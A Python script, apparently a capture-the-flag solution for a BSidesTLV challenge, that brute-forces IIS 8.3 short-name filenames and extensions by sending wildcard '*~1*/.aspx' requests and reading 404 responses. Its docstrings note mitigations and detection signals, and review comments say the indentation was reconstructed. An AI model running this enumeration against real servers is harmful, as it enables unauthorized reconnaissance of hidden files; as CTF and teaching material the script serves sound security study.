import requests
import string
import time
import mimetypes
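def recursive_find_chars(filename, bad_char=None, tree_num=0):
    """Probe the challenge host for short-name prefixes, branching on every hit.

    Each candidate character is appended to ``filename`` and requested as
    ``<prefix>*~1*/.aspx`` (the IIS 8.3 short-name wildcard form).  The script
    treats a 404 as "some short name starts with this prefix".  On a hit it
    first recurses with the same prefix and the hit character excluded, to
    collect sibling names, and then extends the current prefix.

    Defensive note: this oracle only works while the server answers matching
    and non-matching wildcard requests with different status codes.  Disabling
    8.3 short-name generation on the content volume and rejecting ``~`` in
    request paths removes it; bursts of requests containing ``*~1*`` in the
    web log are the corresponding detection signal.

    Args:
        filename: Prefix confirmed so far.
        bad_char: Candidate character to skip at this level.  It must be one
            of the candidate characters, otherwise ``list.remove`` raises
            ``ValueError``.
        tree_num: Recursion depth, used only in the progress output.

    Returns:
        A list holding nested lists from the sibling branches, plus the
        unchanged ``filename`` when no candidate extended it.

    Raises:
        Exception: As soon as a response has status 200 or its body contains
            ``BSidesTLV{``.  This is the author's stop-everything signal and
            is not caught anywhere in this file.
        requests.exceptions.RequestException: On network failure or timeout.
    """
    # NOTE(review): the listing this was taken from had lost its indentation;
    # the nesting below is the most natural reading. Confirm against the
    # original file.
    # '/' needs no backslash: the original '\/' is an invalid escape sequence
    # that newer Python versions warn about. The backslash itself is still
    # excluded through '\\'.
    excluded = '#$%&()*+,-./:;<=>?@[\\]^_`{|}~ \t\n\r\x0b\x0c'
    start_len = len(filename)
    filenames = []
    try_chars = [
        char for char in string.printable
        if char not in string.ascii_uppercase and char not in excluded
    ]
    if bad_char:
        try_chars.remove(bad_char)
    for char in try_chars:
        print('\n-------------------')
        print('Tree num: ', tree_num)
        print('Current filename: ', filename)
        print('Trying char: ', char)
        # A timeout keeps one stalled connection from hanging the whole run.
        r = requests.get(
            'http://iis.challenges.bsidestlv.com/{0}{1}*~1*/.aspx'.format(filename, char),
            timeout=10,
        )
        print(r.text)
        if r.status_code == 200 or 'BSidesTLV{' in r.text:
            raise Exception('\nRESULT\nRESULT\nRESULT\nRESULT\n')
        print('-------------------')
        if r.status_code == 404:
            # Explore the alternatives to this character before committing to it.
            recursive_search = recursive_find_chars(filename, bad_char=char, tree_num=tree_num + 1)
            if recursive_search:
                filenames.append(recursive_search)
            filename += char
    if start_len == len(filename):
        # Nothing extended the prefix at this level: report it as it stands.
        filenames.append(filename)
    return filenames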
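def find_chars():
    """Greedily extend one short-name prefix on the challenge host and print it.

    Candidates are requested as ``<prefix>*~1*/.aspx``.  The first character
    that yields a 404 is appended to the prefix and the scan restarts from
    the first candidate.  The function returns ``None``; the prefix is only
    printed.

    Raises:
        requests.exceptions.RequestException: On network failure or timeout.
    """
    # NOTE(review): the listing this was taken from had lost its indentation;
    # the nesting below is the most natural reading. Confirm against the
    # original file.
    # '/' needs no backslash: the original '\/' is an invalid escape sequence
    # that newer Python versions warn about. The backslash itself is still
    # excluded through '\\'.
    excluded = '#$%&()*+,-./:;<=>?@[\\]^_`{|}~ \t\n\r\x0b\x0c'
    try_chars = [
        char for char in string.printable
        if char not in string.ascii_uppercase and char not in excluded
    ]
    filename = ''
    while True:
        for char in try_chars:
            print('\n-------------------')
            print('Current filename: ', filename)
            print('Trying char: ', char)
            # A timeout keeps one stalled connection from hanging the whole run.
            r = requests.get(
                'http://iis.challenges.bsidestlv.com/{0}{1}*~1*/.aspx'.format(filename, char),
                timeout=10,
            )
            print(r.text)
            print('-------------------')
            if r.status_code == 404:
                filename += char
                break
        else:
            # A full pass without a hit means the prefix cannot grow further.
            # The original repeated the same pass forever here and never
            # reached the final print.
            break
    print('\nFilename: ' + filename)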
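def try_extensions(exts, filename='', exit_on_find=False):
    """Request ``filename + ext`` for every suffix, then retry with a shorter name.

    Any status other than 400 is reported as a result.  After each full pass
    the last character of ``filename`` is dropped and the suffixes are tried
    again, ending with one pass on the empty name.

    Args:
        exts: Iterable of suffixes appended to ``filename``.  When a mapping
            is passed, its keys are used.
        filename: Name to probe; shortened by one character per pass.
        exit_on_find: Return as soon as one response is not a 400.

    Raises:
        requests.exceptions.RequestException: On network failure or timeout.
    """
    # NOTE(review): the listing this was taken from had lost its indentation;
    # the nesting below is the most natural reading. Confirm against the
    # original file.
    base_url = 'http://iis.challenges.bsidestlv.com/'
    while True:
        for ext in exts:
            print('\n-------------------')
            print('Trying ext: ', ext)
            # A timeout keeps one stalled connection from hanging the whole run.
            r = requests.get(base_url + filename + ext, timeout=10)
            print(base_url + filename + ext)
            print(r.text)
            if r.status_code != 400:
                print('\nRESULT\nRESULT\nRESULT\nRESULT\n')
                if exit_on_find:
                    # The original `break` left only the inner loop, so the
                    # function kept probing even when asked to stop.
                    return
            print('-------------------')
        if not filename:
            # Nothing left to trim. The original looped forever on the empty
            # name from this point.
            break
        filename = filename[:-1]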
def main():
    """Run the recursive prefix search from an empty prefix and print its result.

    The commented-out calls are other stages the author ran separately; they
    stay disabled here.
    """
    #find_chars()
    #try_extensions(mimetypes.types_map, filename='l3v3lupah1dd3n', exit_on_find=True)
    #try_extensions(['~1/.aspx', '~1.%3F/.aspx', '~1.%3F%3F/.aspx', '~1.%3F%3F%3F/.aspx'], filename='l3v3lupah1dd3n')
    discovered = recursive_find_chars('')
    summary = 'END RESULT FILENAMES: {0}'.format(discovered)
    print(summary)
# Run the workflow only when executed as a script, not on import.
if '__main__' == __name__:
    main()